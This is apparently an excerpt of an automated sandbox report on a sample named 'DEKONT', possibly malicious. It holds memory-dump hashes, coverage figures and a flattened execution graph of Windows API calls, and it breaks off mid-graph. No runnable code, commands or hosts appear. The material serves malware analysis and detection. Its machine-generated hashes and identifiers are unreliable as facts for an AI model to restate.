                                                              • Opcode ID: d0a63c898e80d2760684143e2dcf922c9027383e29c8d745bc89146612dc9708
                                                              • Instruction ID: 710227a3b5aa25bdcb8560be44de8558a2da8de7f19d66f60eec7b3a1581ca74
                                                              • Opcode Fuzzy Hash: d0a63c898e80d2760684143e2dcf922c9027383e29c8d745bc89146612dc9708
                                                              • Instruction Fuzzy Hash: 9731BBB5D00218DFCB10CFAAD584ADEFBF4AB49324F14846AE815B7310D375AA45CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1372686106.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17ad000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f2578cea2bd35e10d9308bdb0f6fd59f8aec0b32f3021c042b087c8750e5d866
                                                              • Instruction ID: 6afb76d012fa0c621127f879a763d7bf215ebbf86e945bf03e9a84dd2d9811f5
                                                              • Opcode Fuzzy Hash: f2578cea2bd35e10d9308bdb0f6fd59f8aec0b32f3021c042b087c8750e5d866
                                                              • Instruction Fuzzy Hash: 0E2130B1284300DFDB24DF64D984B13FB61FBC8214F60C6ADE80A0B682C33AC407CA62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1372686106.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17ad000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                              • Instruction ID: d36963793e0d70a8b50074ca428a7621dbc26e96d0ac3a292c9aa59577602cf5
                                                              • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                              • Instruction Fuzzy Hash: 1C11BE75544284CFCB12CF54D5C4B16FB62FB88314F24C6A9D8494B656C33AD40ACB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: T+-q$[V~*$[V~*$]\`
                                                              • API String ID: 0-1849991408
                                                              • Opcode ID: 078c71352637b668a2853d82b6d5ee968b5d5dfcd644f5bb067637ccd11c2ed2
                                                              • Instruction ID: 8dd525410a9bd96d229e7ecff966e1caecfe86f57e3be9683c43c90c94f47e47
                                                              • Opcode Fuzzy Hash: 078c71352637b668a2853d82b6d5ee968b5d5dfcd644f5bb067637ccd11c2ed2
                                                              • Instruction Fuzzy Hash: 98B105B0E15259DBCB14CFAAD9809DEFBB6FF89300F14D52AD429BB216D33499028F54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: T+-q$[V~*$]\`
                                                              • API String ID: 0-3978741314
                                                              • Opcode ID: 88c2f39d93efb70b979e56a838d78f7ae8eec83304fdaf070cfd12aefe69d095
                                                              • Instruction ID: 10170d7f6a5cd7689a0cc34cd49db4cab8de9fc3c138a21e93aea75320d01401
                                                              • Opcode Fuzzy Hash: 88c2f39d93efb70b979e56a838d78f7ae8eec83304fdaf070cfd12aefe69d095
                                                              • Instruction Fuzzy Hash: 4FC124B0E152199BCB14CFAAD9809DEFBB6FF89300F14D52AD429BB216D73499028F54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: T+-q$[V~*$]\`
                                                              • API String ID: 0-3978741314
                                                              • Opcode ID: 2055f20e25b2506a3c1f70c591acbdb27f1001026dc8274ba39090831f3136ca
                                                              • Instruction ID: e245a9ef7049c9b8cbcac9eabc1dc05c5e5c25f8cde30590d6c60fd3859a786f
                                                              • Opcode Fuzzy Hash: 2055f20e25b2506a3c1f70c591acbdb27f1001026dc8274ba39090831f3136ca
                                                              • Instruction Fuzzy Hash: EAB105B0E152599BCB04CFAAD9809DEFBF6FF89300F14D52AD429BB216D73499028F54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d908c1a00dd3195c0e11707667688a58cf991831fa2eb7725f50d0a711d3754
                                                              • Instruction ID: 5c17f7233f9ff96adf60cb2e8cfe5f905e63dc046471a46ace40bb1dbd926c81
                                                              • Opcode Fuzzy Hash: 6d908c1a00dd3195c0e11707667688a58cf991831fa2eb7725f50d0a711d3754
                                                              • Instruction Fuzzy Hash: 66E11DB4E006198FDB24CFA9C5805ADBBF6FF89304F248169D458A7356D734AD42CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8964f9ddf9c5fa8dd4ebfc44040094ef7192e537265ca8eba40a441a898308a
                                                              • Instruction ID: 58cd964e8763a7625f3be8ab4642502c2f6562d7d737312a9df87ee373957c08
                                                              • Opcode Fuzzy Hash: e8964f9ddf9c5fa8dd4ebfc44040094ef7192e537265ca8eba40a441a898308a
                                                              • Instruction Fuzzy Hash: 3612A4B0401755CAF330EFA5E9DC18A3BB9BB8672CF504209D2612F2E9DBB4955ACF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f45c17d1105080059c8a2cfb309fd2c5b1d0145b5719700544eb4039687dbf1c
                                                              • Instruction ID: 99db6f67f172540fbaeb1868a41fcce8fb741299d9491fd5fef419a6483011ef
                                                              • Opcode Fuzzy Hash: f45c17d1105080059c8a2cfb309fd2c5b1d0145b5719700544eb4039687dbf1c
                                                              • Instruction Fuzzy Hash: 03E1F9B4E002198FDB24CFA9C580AAEFBF6FF89315F248159D418AB356D734A941CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1c53aad83db9b358fb392e402efe2011396933a0bc6462615d44a940cc14784
                                                              • Instruction ID: 8fdbe127f715dc02f0f73e4c5cab341478a17563fbff6f3c613403d08c8f0241
                                                              • Opcode Fuzzy Hash: e1c53aad83db9b358fb392e402efe2011396933a0bc6462615d44a940cc14784
                                                              • Instruction Fuzzy Hash: A5E1DAB4E002198FDB24CFA9C580AAEBBF6FF89305F248159D418A7356D731AD81CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f240ec88c54ba4dd88661831aa2d6c6720bfd75af787b0d20f1587cdc125b29a
                                                              • Instruction ID: 432c0690a4d91b7d611fab0a0dddc49987e55549f302066b75c6d2634206634a
                                                              • Opcode Fuzzy Hash: f240ec88c54ba4dd88661831aa2d6c6720bfd75af787b0d20f1587cdc125b29a
                                                              • Instruction Fuzzy Hash: 03E10BB4E002198FDB24CFA9C5809AEBBF6FF89315F248169D419A7356D730AD41CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b465967e34a9b9ae15618ff64a431274c7d7f838c0927f360f91fd3e4e893ac2
                                                              • Instruction ID: 80c80a34eaee18774e58d8c40bdb04cef2fbf719fa7b5c2c885c2911cea93e2b
                                                              • Opcode Fuzzy Hash: b465967e34a9b9ae15618ff64a431274c7d7f838c0927f360f91fd3e4e893ac2
                                                              • Instruction Fuzzy Hash: FFD1173192071A8ADB01EBA8D990A9DB7B1FFD5300F50C79AE40937214EF70AAD5CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55440b2ccaf940acce179dd18efad2ce7e29de79cf0fd0d699bf427b84e08b0f
                                                              • Instruction ID: 004c38d3c0559bf0dcbf7eeb08f73c61bd829f52abbf605e19eca07e9921857c
                                                              • Opcode Fuzzy Hash: 55440b2ccaf940acce179dd18efad2ce7e29de79cf0fd0d699bf427b84e08b0f
                                                              • Instruction Fuzzy Hash: F3A14B32A0021A9FCF15DFB4C88459EFBB2FF84300B25456AEA05AB365DF71E955CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b401a1dc16e2ca85097d100cd706a3fe498530009689c52fe45ed81d3b590aef
                                                              • Instruction ID: 268abfe3f10fc5c3404aa987c53e8408dc863b23255d2b6a10c8fb321a454af8
                                                              • Opcode Fuzzy Hash: b401a1dc16e2ca85097d100cd706a3fe498530009689c52fe45ed81d3b590aef
                                                              • Instruction Fuzzy Hash: F8D1163192071A8ADB01EBA8D990A9DB7B1FFD5300F50C79AE40937214EF70AAD5CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ebb41ab455d645ac1f2f53789860d9e74e916e19c4d2d299b32d3f97918ed5d9
                                                              • Instruction ID: 87ab772a2c81e0a4098d8c56a316fb4eeed3349043ea2910689b50fa989dd1a6
                                                              • Opcode Fuzzy Hash: ebb41ab455d645ac1f2f53789860d9e74e916e19c4d2d299b32d3f97918ed5d9
                                                              • Instruction Fuzzy Hash: 40C11BB1401755CBF720EFA4E8D818A7BB9BB8672CF504309D2616F2D8DBB4945ACF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a0b477a09d5738516135f5d6a2bf1c7e60219f695967000ac19787f00593ed8
                                                              • Instruction ID: 8ab0de0f7e9a7363a1486c05b6289a156cce813ef304dfc41f29da460d4d1452
                                                              • Opcode Fuzzy Hash: 6a0b477a09d5738516135f5d6a2bf1c7e60219f695967000ac19787f00593ed8
                                                              • Instruction Fuzzy Hash: ED513BB0E1120EDBCB14CFE6E4516EEBBF6EF89210F10942AE425E7354E7345A028F94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05d775d4530282b63eb222cab2b9c7532dd400df561e7e44c68f918402448564
                                                              • Instruction ID: 6979a1527b82697c052387d4a8d37c1c5d390d718bded9fce0add175ad426af2
                                                              • Opcode Fuzzy Hash: 05d775d4530282b63eb222cab2b9c7532dd400df561e7e44c68f918402448564
                                                              • Instruction Fuzzy Hash: 585139B0E1120EDBCB14CFA6E4555EEBBF6EF89210F10942AE025A7254E7345A028F94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e160d6d0973ad564e9163db19f31552a3fc8ecf13d3c83ca86cbe22877272be7
                                                              • Instruction ID: f533627cc3efe8694d9626d0106e4e6a5ba76e4d3b21440b1d258f02255c6e94
                                                              • Opcode Fuzzy Hash: e160d6d0973ad564e9163db19f31552a3fc8ecf13d3c83ca86cbe22877272be7
                                                              • Instruction Fuzzy Hash: 4C51ECB1E002198FDB24CFAAC5809EEBBF6FF89215F148169D418A7316D7355941CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89d52f85a5cce643ac4c8d9b35ed71ba127b1239338ead7ea5ef659e272e7bdc
                                                              • Instruction ID: a9c382d8cc6f4445f1b445eda01cdfc460936623438c313832e166eadc5a647f
                                                              • Opcode Fuzzy Hash: 89d52f85a5cce643ac4c8d9b35ed71ba127b1239338ead7ea5ef659e272e7bdc
                                                              • Instruction Fuzzy Hash: E331A8B9D012189FCB14CFA9D984A9EFBF5BB49310F24942AE808B7310D735AA45CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b5f93939fdd0e7f654d74bb82a950d5c98bbdd5d8d28229a7ef30d39d48d553
                                                              • Instruction ID: 0116a4d6424ad077ddaaa0e4eb021d0bdeaa97d76d6399152a6b942b84e13130
                                                              • Opcode Fuzzy Hash: 7b5f93939fdd0e7f654d74bb82a950d5c98bbdd5d8d28229a7ef30d39d48d553
                                                              • Instruction Fuzzy Hash: 743197B8D012589FCB14CFA9D984A9EFBF5BF49310F24902AE818B7310D335AA45CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd7b207fdd7dbec47b43bc4bf578d53f7fc6627400e95a54b238328177408989
                                                              • Instruction ID: 61b6d0c17d43965e042e1159688d5ccffe6fc0694ef51432ff3e91653fc8a979
                                                              • Opcode Fuzzy Hash: bd7b207fdd7dbec47b43bc4bf578d53f7fc6627400e95a54b238328177408989
                                                              • Instruction Fuzzy Hash: F83186B8D012589FCB14CFA9E984A9EFBF1BF49310F24942AE819B7210D335AA45CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c51295c0e065c81370a425ec5dc161f406863e200c8e1921adf6064153cc4dd
                                                              • Instruction ID: 586a6794335739cb09e004d17432b4027c03f077d82a7856e9607dec3dc39316
                                                              • Opcode Fuzzy Hash: 4c51295c0e065c81370a425ec5dc161f406863e200c8e1921adf6064153cc4dd
                                                              • Instruction Fuzzy Hash: F2317EB8D05209EFCB14CFA9D584AEDBBF2BB89310F24912AE828B7350C3349941CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3b58962bbe7affd17fda833a7a66aac53894a9102aa16a0ca8b391d517d76ead
                                                              • Instruction ID: 04724f0d5f1505798da2e175913bf1dcf45bc8321fcc507b428d16a1a6641192
                                                              • Opcode Fuzzy Hash: 3b58962bbe7affd17fda833a7a66aac53894a9102aa16a0ca8b391d517d76ead
                                                              • Instruction Fuzzy Hash: 7E315BB4D05209EFCB14CFA9D894AEDBBF6BB89310F24912AE824B7350D7349941CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2530721f1a8f9f2fa4cadd0017d195e89b5f0dd88d7ec4363591669e98fa57c0
                                                              • Instruction ID: 4d29e0a991d716c0c167d737f2069a22166a98d51afcf3089e135ecc54932944
                                                              • Opcode Fuzzy Hash: 2530721f1a8f9f2fa4cadd0017d195e89b5f0dd88d7ec4363591669e98fa57c0
                                                              • Instruction Fuzzy Hash: E221A0B4D00209DFDB14CFAAD4946EEBBB1BB89310F20E52AE825B7290D7348545CF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 779a19a6c6d0b1d468452ccb01d33878f908f16d44602d73c888ab82c98ebccf
                                                              • Instruction ID: 8d7058a14ae9b4327e62a4da0bfbc0149fed6806534bb8334540e44aa41e03ae
                                                              • Opcode Fuzzy Hash: 779a19a6c6d0b1d468452ccb01d33878f908f16d44602d73c888ab82c98ebccf
                                                              • Instruction Fuzzy Hash: 34219FB4D00209DFDB24CFAAD4846EEBBF5BB89310F10E12AE825B7290D7349945CF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 63844b3a0cfc0b1128c5bc76304018f09981f274532cde4e73587327403518db
                                                              • Instruction ID: 948950c65c5bae92d84bbb8e5f965cff1219a305fc8b8efc320fc967bc8525d6
                                                              • Opcode Fuzzy Hash: 63844b3a0cfc0b1128c5bc76304018f09981f274532cde4e73587327403518db
                                                              • Instruction Fuzzy Hash: 66F07FB5E052099F8F04CFA9D4814EEFBF2BB5A310F10A16AE815B3314E7358941CF68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
                                                              • Instruction ID: cb3ee2193c3824a0808c5901599a82033cdd2bc226169379f9c7239e9b125e87
                                                              • Opcode Fuzzy Hash: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
                                                              • Instruction Fuzzy Hash: 26F03FB5D052089B8F04DFA9D5418EEFBF6AB5A310F10A16AE814B3310E73599518FA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d124d54709a0200fe324fa44f501502fd54105613a15863db6fdf20413fde435
                                                              • Instruction ID: ed6ae6f2b73c0aee853fd55136cd34e9f423c2384705c165590a87f54776b2cf
                                                              • Opcode Fuzzy Hash: d124d54709a0200fe324fa44f501502fd54105613a15863db6fdf20413fde435
                                                              • Instruction Fuzzy Hash: 2DE030B4969108DFCB248F90E8456FCFBBCA78B311F043095D42E93112C7304A85CB00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:10.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:1.6%
                                                              Total number of Nodes:182
                                                              Total number of Limit Nodes:20
                                                              execution_graph 38705 6d04b68 38706 6d04bae GetCurrentProcess 38705->38706 38708 6d04c00 GetCurrentThread 38706->38708 38709 6d04bf9 38706->38709 38710 6d04c36 38708->38710 38711 6d04c3d GetCurrentProcess 38708->38711 38709->38708 38710->38711 38712 6d04c73 38711->38712 38717 6d04d48 38712->38717 38720 6d04d38 38712->38720 38713 6d04c9b GetCurrentThreadId 38714 6d04ccc 38713->38714 38724 6d04834 38717->38724 38721 6d04d48 38720->38721 38722 6d04834 DuplicateHandle 38721->38722 38723 6d04d76 38722->38723 38723->38713 38725 6d04db0 DuplicateHandle 38724->38725 38726 6d04d76 38725->38726 38726->38713 38727 5b2bd0b 38728 5b2bbcf 38727->38728 38729 5b2bcb3 38728->38729 38734 5b2bfc4 38728->38734 38739 5b2be18 38728->38739 38743 5b2be28 38728->38743 38747 5b2bf64 38728->38747 38735 5b2bf43 38734->38735 38736 5b2bfc9 38734->38736 38737 5b2be79 LdrInitializeThunk 38735->38737 38738 5b2be86 38735->38738 38736->38729 38737->38738 38738->38729 38740 5b2be50 LdrInitializeThunk 38739->38740 38742 5b2be86 38740->38742 38742->38729 38744 5b2be50 LdrInitializeThunk 38743->38744 38746 5b2be86 38744->38746 38746->38729 38748 5b2bf43 38747->38748 38749 5b2be79 LdrInitializeThunk 38748->38749 38750 5b2be86 38748->38750 38749->38750 38750->38729 38524 2dcd3d0 38525 2dcd3dc 38524->38525 38535 5b2db18 38525->38535 38541 5b2db09 38525->38541 38526 2dcd4c8 38547 6ce8a48 38526->38547 38552 6ce8a58 38526->38552 38527 2dcd5b6 38528 2dcd611 38527->38528 38557 6d03a5e 38527->38557 38561 6d03a60 38527->38561 38537 5b2db3a 38535->38537 38536 5b2df19 38536->38526 38537->38536 38565 5b289b0 38537->38565 38539 5b2bb70 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 38540 5b2dc04 38539->38540 38540->38536 38540->38539 38542 5b2db3a 38541->38542 38543 5b289b0 LdrInitializeThunk 38542->38543 38544 5b2df19 38542->38544 38546 5b2dc04 38543->38546 38544->38526 38545 5b2bb70 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 38545->38546 38546->38544 38546->38545 38548 6ce8a7a 38547->38548 38549 6ce8b8c 38548->38549 38550 5b289b0 LdrInitializeThunk 38548->38550 38569 5b28d94 38548->38569 38549->38527 38550->38549 38553 6ce8a7a 38552->38553 38554 6ce8b8c 38553->38554 38555 5b289b0 LdrInitializeThunk 38553->38555 38556 5b28d94 LdrInitializeThunk 38553->38556 38554->38527 38555->38554 38556->38554 38558 6d03a6f 38557->38558 38573 6d0312c 38558->38573 38562 6d03a6f 38561->38562 38563 6d0312c 7 API calls 38562->38563 38564 6d03a90 38563->38564 38564->38528 38568 5b289e1 38565->38568 38566 5b28b41 38566->38540 38567 5b28ed1 LdrInitializeThunk 38567->38566 38568->38566 38568->38567 38570 5b28c4b 38569->38570 38571 5b28ed1 LdrInitializeThunk 38570->38571 38572 5b28ee9 38571->38572 38572->38549 38574 6d03137 38573->38574 38577 6d04904 38574->38577 38576 6d05416 38576->38576 38578 6d0490f 38577->38578 38579 6d05b3c 38578->38579 38581 6d077c8 38578->38581 38579->38576 38582 6d077e9 38581->38582 38583 6d0780d 38582->38583 38586 6d07978 38582->38586 38590 6d07969 38582->38590 38583->38579 38587 6d07985 38586->38587 38589 6d079be 38587->38589 38594 6d05f7c 38587->38594 38589->38583 38591 6d07978 38590->38591 38592 6d079be 38591->38592 38593 6d05f7c 7 API calls 38591->38593 38592->38583 38593->38592 38595 6d05f87 38594->38595 38597 6d07a30 38595->38597 38598 6d05fb0 38595->38598 38597->38597 38599 6d05fbb 38598->38599 38605 6d05fc0 38599->38605 38601 6d07a9f 38609 6d0ce88 38601->38609 38617 6d0cea0 38601->38617 38602 6d07ad9 38602->38597 38608 6d05fcb 38605->38608 38606 6d08dc0 38606->38601 38607 6d077c8 7 API calls 38607->38606 38608->38606 38608->38607 38610 6d0cea0 38609->38610 38612 6d0cedd 38610->38612 38626 6d0d118 38610->38626 38630 6d0d108 38610->38630 38611 6d0cf1d 38634 6d0e820 38611->38634 38644 6d0e812 38611->38644 38612->38602 38619 6d0ced1 38617->38619 38620 6d0cfd1 38617->38620 38618 6d0cedd 38618->38602 38619->38618 38622 6d0d118 4 API calls 38619->38622 38623 6d0d108 4 API calls 38619->38623 38620->38602 38621 6d0cf1d 38624 6d0e820 4 API calls 38621->38624 38625 6d0e812 4 API calls 38621->38625 38622->38621 38623->38621 38624->38620 38625->38620 38654 6d0d158 38626->38654 38664 6d0d168 38626->38664 38627 6d0d122 